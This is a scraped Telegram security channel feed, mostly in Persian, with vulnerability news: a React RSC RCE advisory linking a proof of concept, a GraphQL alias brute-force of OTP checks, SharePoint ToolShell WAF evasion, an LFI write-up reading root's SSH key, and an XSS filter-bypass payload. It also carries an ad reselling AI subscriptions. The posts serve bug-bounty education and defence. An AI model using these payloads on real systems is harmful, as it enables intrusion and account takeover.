World Of Security – Telegram
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
🔴 آسیب‌پذیری بحرانی RCE در React Server Components 🔥
شناسه: CVE-2025-55182 (درجه خطر: 10/10 - Critical)

یک آسیب‌پذیری بسیار خطرناک (RCE) را در پکیج‌های مربوط به React Server Components (RSC)
این باگ به مهاجم اجازه می‌دهد بدون نیاز به احراز هویت (Unauthenticated)، کدهای مخرب خود را روی سرور شما اجرا کند.

⚠️ مکانیزم حمله:
مشکل در نحوه پردازش و Decode کردن Payloadهایی است که کلاینت به اندپوینت‌های Server Function می‌فرستد.
هنگامی که React درخواست‌های HTTP مخرب ارسال شده توسط مهاجم را Deserialize می‌کند، به دلیل عدم اعتبارسنجی صحیح، کد مهاجم روی سرور اجرا می‌شود.

🚨 پروژه‌های تحت تاثیر؟
حتی اگر در پروژه خود صراحتاً از Server Functions استفاده نکرده باشید، اما ساختار پروژه شما از RSC پشتیبانی کند (مثل پروژه‌های Next.js)، آسیب‌پذیر هستید.

🛠 نسخه‌های آسیب‌پذیر React:
نسخه‌های 19.0، 19.1.0، 19.1.1 و 19.2.0
راه حل فوری (همین الان آپدیت کنید):
باید پکیج‌های react و react-dom و به خصوص پکیج‌های react-server-dom-* را به یکی از نسخه‌های زیر ارتقا دهید:
🔹 19.0.1
🔹 19.1.2
🔹 19.2.1
📌 کاربران Next.js:
سریعاً نسخه Next.js خود را بر اساس ورژن فعلی‌تان به یکی از نسخه‌های پچ‌شده زیر آپدیت کنید:
next@15.0.5
next@15.1.9
next@15.2.6
next@16.0.7
(اگر روی نسخه Canary هستید، حتما به نسخه Stable دانگرید کنید)


https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

PoC

https://github.com/ejpir/CVE-2025-55182-poc/blob/main/exploit-rce-v4.js
🔥74👍2
چطور  Rate Limit را در GraphQL دور بزنیم؟

در معماری‌های امنیتی سنتی، ابزارها (مثل WAF) معمولاً ترافیک را بر اساس تعداد درخواست HTTP در واحد زمان کنترل می‌کنند. مثلاً: "هر IP مجاز است در دقیقه 10 درخواست ارسال کند".

این قانون در REST API عالی کار می‌کند، اما در GraphQL می‌تواند یک حفره امنیتی بزرگ باشد!

🔹 مشکل کجاست؟ در GraphQL، مفهوم "یک درخواست HTTP" لزوماً برابر با "یک عملیات دیتابیس" نیست. ساختار این زبان اجازه می‌دهد چندین کوئری را در یک بدنه (Body) ارسال کنید.

اما محدودیت JSON این است که کلید تکراری قبول نمی‌کند. پس چطور می‌توانیم یک تابع (مثلاً checkOTP) را ۱۰۰ بار صدا بزنیم؟ اینجاست که ویژگی Alias وارد می‌شود.

🛠 نحوه حمله (Batching via Aliases): هکر به جای ارسال 100 درخواست جداگانه (که بلافاصله توسط فایروال بلاک می‌شود)، یک درخواست غول‌پیکر می‌سازد و با استفاده از Alias، خروجی‌ها را نام‌گذاری می‌کند:

mutation BruteForceOTP {
try1: checkOtp(code: "0001")
try2: checkOtp(code: "0002")
try3: checkOtp(code: "0003")
...
try999: checkOtp(code: "0999")
}


👀 آنچه در شبکه اتفاق می‌افتد:
1️⃣ فایروال (WAF): فقط 1 درخواست HTTP می‌بیند. چون 10 > 1 است، اجازه عبور می‌دهد.
2️⃣ سرور GraphQL: بسته را باز می‌کند، Aliasها را می‌بیند و تابع checkOtp را 999 بار اجرا می‌کند!

این یعنی هکر با  1 درخواست شبکه، 1000 بار به دیتابیس یا سیستم لاگین حمله Brute-force کرده است.

#api #graphql #waf #bugbounty

منبع:
https://www.intigriti.com/researchers/blog/hacking-tools/five-easy-ways-to-hack-graphql-targets
🔥95
Forwarded from Nova AI
🎓 🔥فرصتی طلایی برای دانشجویان!

🚀 🧠ارائه اکانت Gemini Pro یک‌ساله با مدارک وریفای‌شده،دسترسی به مدل 2.5 pro بدون محدودیت(روی جیمیل شخصی شما📬📩) + پلن یک ماهه جمینای پرو با کمترین قیمت
💭اکانت های یک ماهه جمینای با تضمین بهترین قیمت و کیفیت دارای قوی ترین مدل های ریاضیات و کد نویسی🚨
ساخت فیلم هایی کوتاه و با پشتیبانی از زبان فارسی با veo3 و veo3.1
دسترسی به جدید ترین مدل های Google Ai Studio
> 🚀 افزایش محدودیت روزانه در Gemini Code Assist و Gemini CLI
> مناسب برای برنامه‌نویسان و توسعه‌دهندگان حرفه‌ای
> 💡 دسترسی به مدل قدرتمند Gemini 2.5 Pro
> به همراه Deep Research و تولید ویدیو با Veo 3.1 Fast
> 🎁 ۱۰۰۰ اعتبار ماهانه برای تولید ویدیو در Flow و Whisk
> 🎬 دسترسی به Flow برای ساخت صحنه‌های سینمایی با Veo 3.1
> پشتیبانی از زبان فارسی در ورودی متن
> 🖼 دسترسی به Whisk برای تبدیل تصویر به ویدیو با Veo 3
> پشتیبانی کامل از زبان فارسی در ساخت ویدیو
> 🧠 استفاده گسترده‌تر از NotebookLM فعال شدن تمامی قابلیت های پرمیوم!(موضوع بده فیلم آموزشیشو بگیر!)
> با ۵ برابر Audio Overview و امکانات تحقیق و نوشتار
> 🧩 ادغام Gemini در Gmail، Docs، Vids و سایر اپ‌های گوگل
> 🏠 فعال بودن Google Home Premium (پلن استاندارد)
> شامل ۳۰ روز تاریخچه رویداد و ویژگی‌های هوشمند
> ☁️فعال شدن ۲ ترابایت فضای ذخیره‌سازی در Photos، Drive و Gmail


فروش فوق‌العاده پلن ChatGPT Pro روی ایمیل شخصی شما تنها با قیمت استثنایی 9⃣4️⃣4️⃣ هزار تومان
> 🧩 اشتراک ChatGPT Pro – نسخه کامل و بدون محدودیت
> 🎥 دسترسی به مدل قدرتمند "Sora2"
> 🔝 جدیدترین و قوی‌ترین مدل ساخت ویدیو در جهان
> 🧠 فعال شدن نامحدود مدل "5 Thinking"
> بدون هیچ‌گونه محدودیت در استفاده
> 💡 دسترسی به مدل "Pro" برای ریسرچ حرفه‌ای، ایده‌پردازی، خلاقیت و تولید محتوا
> 🧾 حذف کامل محدودیت تعداد پیام روزانه
> 🚀 استفاده بدون توقف و با بالاترین سرعت
> 📁 فعال شدن امکان آپلود فایل
> 🧠 دریافت تحلیل، خلاصه و پاسخ هوشمند بر اساس محتوای فایل
> 💬 عملکرد بسیار سریع‌تر در ساعات شلوغ
> 🎯 همراه با اولویت پاسخ‌دهی و پردازش
> 🧑‍💻 قدرت کدنویسی بی‌نظیر با پشتیبانی از ابزارهای حرفه‌ای


💡 پلن ChatGPT Pro یک‌ماهه تضمینی و قانونی روی ایمیل شخصی شما
🎁 مهلت تست رایگان 🔢 ساعته ویژه دانشجویان
📌 این یک فرصت باورنکردنیه؛ از دستش ندید!

همین حالا جهت تست و مشاوره پیام بدید
@Nova_AI_Support💎


ثبت سفارش سریع و مقایسه مدل مناسب برای حرفه شما در بات :
@Nova_Shop_bot🤖
Please open Telegram to view this post
VIEW IN TELEGRAM
7👍4🥰2
‼️ بررسی آسیب‌پذیری ToolShell و بای‌پاس پچ مایکروسافت که منجر به اجرای کد از راه دور (RCE) شد.

انتشار اسلایدهای ارائه فنی سروش دلیلی و پدرام حیاتی در کنفرانس NDC Manchester 2025. این پژوهش یک Case Study فوق‌العاده از شکست مکانیزم‌های دفاعی و احیای مجدد یک آسیب‌پذیری بحرانی است.

🛠محورهای فنی ارائه:

🔹بردار حمله (Attack Vector): این حمله بر روی اندپوینت ToolPane.aspx متمرکز است. در این روش، مهاجم با بهره‌گیری از تکنیک Referer Header Spoofing و جعل درخواست از سمت SignOut، موفق می‌شود مکانیزم Authentication شیرپوینت را بای‌پاس کرده و دسترسی Unauthenticated به سیستم پیدا کند.



🔹شکست پچ (The Patch Bypass): چرا فیکس اولیه مایکروسافت کار نکرد؟ تحلیل دقیق اینکه چطور با تغییرات جزئی در درخواست (Request Mutation)، چک‌های امنیتی جدید مایکروسافت بای‌پاس شدند و آسیب‌پذیری با CVEهای جدید (CVE-2025-53770 / 53771) مجدداً اکسپلویت شد.

🔹 فرار از WAF (WAF Evasion): بررسی تکنیک‌های Obfuscation و دستکاری پیلود برای کور کردن رول‌های امنیتی WAF (از جمله Azure WAF) که اختصاصاً برای بلاک کردن ToolShell تنظیم شده بودند.

🔹 فاکتور هوش مصنوعی (AI Patch Diffing): یک آزمایش جذاب: آیا LLMها می‌توانستند با مقایسه باینری پچ‌شده و نسخه آسیب‌پذیر، این باگ منطقی (Logic Flaw) را زودتر از هکرها شکار کنند؟
⬇️ دانلود اسلایدها (GitHub): 🔗 ToolShell Patch Bypass & AI - NDC 2025
#ExploitDev #SharePoint #RCE #WAFBypass #RedTeam #AppSec #Research
🔥63👍1
و چالش بعدی هم آخر هفته قرار میگیره
👍5
⚠️ تحلیل فنی زنجیره حمله iOS
CVE-2025-31200 & CVE-2025-31201
ترکیب دو باگ بحرانی در اکوسیستم اپل، امکان نفوذ به لایه‌های سخت‌افزاری را فراهم کرده است.
نفوذ اولیه: CoreAudio باگ CVE-2025-31200 از نوع Memory Corruption در پردازش صداست. مهاجم با یک فایل مدیا دست‌کاری شده و بهره‌برداری از نقص مدیریت حافظه، پتانسیل اجرای حمله Zero-Click را پیدا می‌کند.
دور زدن امنیت: PAC Bypass در مرحله دوم، آسیب‌پذیری CVE-2025-31201 مکانیزم حفاظتی PAC را هدف قرار می‌دهد. مهاجم با دسترسی Arbitrary Read/Write، امضای پوینترها را دور زده و کنترل کامل پروسس را در سطح بالا به دست می‌گیرد.
اهمیت امنیتی این اکسپلویت ترکیبی در حملات هدفمند واقعی علیه کاربران اپل استفاده شده و توانایی عبور از سدهای امنیتی مدرن را دارد.
وضعیت وصله این زنجیره در iOS 18.4.1 و macOS 15.4.1 مسدود شده است. آپدیت فوری جهت جلوگیری از نفوذ الزامی است.

#Security #iOS #Exploit #PAC #CVE2025
8
The Fragile Lock: Novel Bypasses For SAML Authentication

بایپس احراز هویت SAML در Ruby و PHP

https://portswigger.net/research/the-fragile-lock
8🔥2
📌 برگزاری جلسه ویس چت :  مهندس مهرشاد علیزاده

با درود خدمت دوستان و همراهان عزیز، 
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسه‌ای تخصصی و آموزشی در خصوص واقعیت ‌های باگ بانتی در ایران از جذابیت تا سختی ‌هایی که این حوزه دارد به صورت ویس چت برگزار کنیم.

🎙 مهمان ویژه: 
مهندس مهرشاد علیزاده

📅 زمان برگزاری: پنجشنبه 1404/10/11
📍 پلتفرم: تلگرام (ویس چت)
🕗 ساعت : 19:00
🔖  لینک جلسه :
🎙 قسمت اول
⁉️ موضوعات ما :
📖 قسمت اول تعریف واقع بینانه باگ بانتی در ایران

💬 سوالات خود را درباره باگ بانتی در ایران در کامنت‌هاارسال کنید تا در جلسه به آن‌ها پرداخته شود.

🔔 نکته مهم: 
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .


🆔 @RadioZeroPod
🆔 @TryHackBox
5🔥5
🎯 از یک LFI ساده تا Full Root RCE!

امروز قراره یک رایتاپ جذاب رو بررسی کنیم؛ جایی که مهاجم از یه باگ LFI ساده شروع کرد و در نهایت به دسترسی کامل Root از طریق SSH رسید!
ماجرا از یک اندپوینت ناامن شروع شد؛ جایی که سرور بدون هیچ اعتبارسنجی، ورودی کاربر رو به عنوان URL دریافت و پردازش می‌کرد:
target.com/down.do?url=<input>

مهاجم شروع کرد به بررسی File Traversal کرد و خیلی سریع فهمید که می‌تونه فایل‌های سیستم رو بخونه:
/down.do?url=../../../../../etc/passwd

همین کافی بود تا وارد فاز دوم حمله بشه: خواندن فایل‌های حساس‌تر! 🔍
این بار هدفش SSH Private Key مربوط به کاربر root بود:
/down.do?url=../../../../../root/.ssh/id_ed25519

سرور بدون هیچ محدودیتی این فایل رو هم افشا کرد...😬

خب حالا مهاجم چه چیزایی در اختیار داره؟
دسترسی LFI
Private Key کاربر root
در نتیجه اتصال SSH به عنوان کاربر root!
ssh -i id_ed25519 -o IdentitiesOnly=yes root@<redacted-ip>

و به این ترتیب، مهاجم کنترل کامل سرور رو به دست گرفت! 🎯

نکات قابل توجه:
ورودی‌های کاربر همیشه باید اعتبارسنجی شوند
دسترسی به فایل‌های حساس باید محدود گردد
در آخر اینکه Private Keyها هرگز نباید روی سرور بدون محافظت باقی بمانند.

لینک رایتاپ

#RCE #LFI #Path_Traversal
9🔥6
World Of Security
از دوستان هرکسی تمایل به همکاری در شرکت آشنا ایمن ( پوزیشن تست نفوذ ) را دارد یک رزومه برای بنده ارسال کند. @nashenas_tm فقط دوستان توجه کنید که شرایط همکاری به صورت حضوری و تمام وقت هست.
دوستانی که رزومه برای بند فرستادند یک یادآوری به بنده بکنند امروز. تعداد پیام ها خیلی بالاست :)

که بتونیم تایم مصاحبه رو حتما ست کنیم
5
World Of Security
سلام و وقت بخیر خدمت دوستان 😁👾 چلنج دوم شروع شد و حدودا تا ۳ شنبه مورخ  چهارم آذر ماه زمان دارید برای ارسال پاسخ ctf کد آسیب پذیر رو زیر همین پست قرار میدیم و کافیه توی یک html فایل بیاریدش بالا این چلنج هم جایزه داره و بین کسانی که جواب درست رو بدن قرعه…
https://youtu.be/HPKfd7Muusg?si=hIXvTp967MQI2zk8


ویدیو حل چالش

دوستان از این به بعد قراره کلی محتوا تو حوزه infosec داشته باشیم تو کانال یوتیوب هم آموزش هم اگر باگ هایی که تو هکروان می‌زنیم رو تو یوتیوب شبیه ترین سناریو رو آموزش میدهیم



حمایت کنید ممنون😁❤️
13🔥4
Found an XSS bypass during a bug bounty:
Backend was only stripping quotes ("), so payload like:

<s"vg o"nload=al"ert() />

turns into a valid:

<noscript onload=alert()>

🚨 Never rely on poor input filtering!

#BugBounty #CyberSecurity
6👍3